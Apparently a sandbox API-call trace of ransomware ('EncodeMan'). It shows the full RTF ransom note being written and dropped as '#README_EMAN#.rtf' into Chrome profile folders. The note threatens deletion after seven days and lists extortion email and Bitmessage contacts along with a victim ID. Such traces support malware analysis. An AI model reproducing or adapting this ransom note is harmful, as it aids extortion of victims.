INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.243] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2460ba8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.243] WriteFile (in: hFile=0x2e8, lpBuffer=0x2460ba8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2460ba8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.243] CloseHandle (hObject=0x2e8) returned 1 [0292.243] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\#readme_eman#.rtf")) returned 0x20 [0292.244] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\#readme_eman#.rtf")) returned 0x20 [0292.244] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\indexeddb\\https_www.google.de_0.indexeddb.leveldb\\#readme_eman#.rtf")) returned 0x20 [0292.244] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\#readme_eman#.rtf")) returned 0x20 [0292.244] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\#readme_eman#.rtf")) returned 0xffffffff 